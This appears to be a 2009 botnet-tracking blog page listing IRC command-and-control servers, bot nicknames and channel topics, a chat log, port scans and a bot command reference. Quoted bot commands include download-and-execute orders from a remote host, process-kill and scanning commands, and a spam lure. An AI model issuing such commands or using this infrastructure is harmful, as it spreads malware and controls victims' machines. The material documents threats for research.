Month: May 2009

– DNS Queries:jiets.soidudrf.com – IRC Conversations:72.10.172.218:8492Nick: VOWVCYfmUsername: lxqelaJoined Channel: ##russia##Channel Topic for Channel ##russia##: “=O/cZwecjbt/uzPbb55wb2nEVMjqSLc0wInUSxC/PKbrqWbCdnnfqz+KJt14q” here some logs for fun Session Start: Wed May 06 20:13:18 2009Session Ident: Baadshah[8:13] stop posting my nets[8:13] (Pig) give source[8:13] (Baadshah) :p[8:13] (Baadshah) stop posting my nets[8:13] (Baadshah) no[8:13] (Baadshah) fuck you[8:13] (Pig) and i wont post them anymore[8:13]Read more...

173.8.227.166:1800(xxxxxxx) – “:stop!fcuk@root.edu PRIVMSG #fucking# :.login s3x “

IRC DataUser Name: bgkboHost Name: 0Server Name: Real Name: _CHAR(0x03)_15‹_CHAR(0x03)_4·_CHAR(0x03)_01_CHAR(0x02)_l_CHAR(0x02)_a_CHAR(0x03)_04_CHAR(0x02)_m_CHAR(0x02)__CHAR(0x03)_01e_CHAR(0x02)_r_CHAR(0x02)__CHAR(0x03)_4·_CHAR(0x03)_15›Nick Name: [USA]XP-SP2[00]7915Non RFC Conform: 1ChannelName: #l#Password: lamTopic Deleted: :.asc asn445 100 3 0 -r -b -s Notice Message DeletedValue: :mi67.three.co.lt NOTICE AUTH :*** Looking up your hostname…Value: :mi67.three.co.lt NOTICE AUTH :*** Couldn’t resolve your hostname; using your IP address instead Remote Address: 66.252.13.212Remote Port: 16667

C&C Server: 201.216.200.91:80Username: XP-4848Nickname: [P00|DEU|98246912]Channel: #13 (Password: )Channeltopic: :.t kill all |.flushdns |.update http://66.11.114.38/~gamegone/test.exe e7q8c4j8r7f4.exe e7q8c4j8r7f4

C&C Server: 72.10.169.26:2293Server Password:Username: twiparNickname: PThnLutK* Channel: #siwa (Password: )* Channeltopic: :=zazAUf0FErV2zHjHTURFckN74vZSLYneVmP8RvN1NRIAo/AzuvE+hcoPebxc5ZBag6mjr5Do35/y4jO920Mh9RVkbld491WKMI8IB5sLPba4r4ajE/4hhmEONH1WvB

208.11.181.33 (4244) PORT STATE SERVICE VERSION25/tcp open smtp80/tcp open http Microsoft IIS webserver 6.0106/tcp open pop3pw?110/tcp open pop3119/tcp open nntp Microsoft NNTP Service 6.0.3790.1830 (posting ok)135/tcp filtered msrpc137/tcp filtered netbios-ns139/tcp filtered netbios-ssn143/tcp open imap389/tcp open ldap?445/tcp filtered microsoft-ds554/tcp open rtsp?563/tcp open snews?593/tcp filtered http-rpc-epmap623/tcp filtered unknown664/tcp filtered unknown1025/tcp open msrpc Microsoft Windows msrpc1050/tcp open msrpcRead more...

pro0f3th1s.dd.blueline.be:50123chan #serverpw=0%1#Q12aCommands!login Your Password!join #example!part #example!dl.start http://example.de/file.exe C:file.exe 1 (0=No 1=Execute)!dl.stop (To Stopping Download)!update http://example.de/ 1 (0=No 1=Execute)!remove (To Removing the Bot)!msn.msg Its Your Body @ the Image?Resolved : [pro0f3th1s.dd.blueline.be] To [213.163.64.43]Initiating SYN Stealth Scan against amsterdam.perfect-privacy.com (213.163.64.43 ) [1660 ports] at 06:16Discovered open port 80/tcp on 213.163.64.43Discovered open port 21/tcp on 213.163.64.43Discovered open portRead more...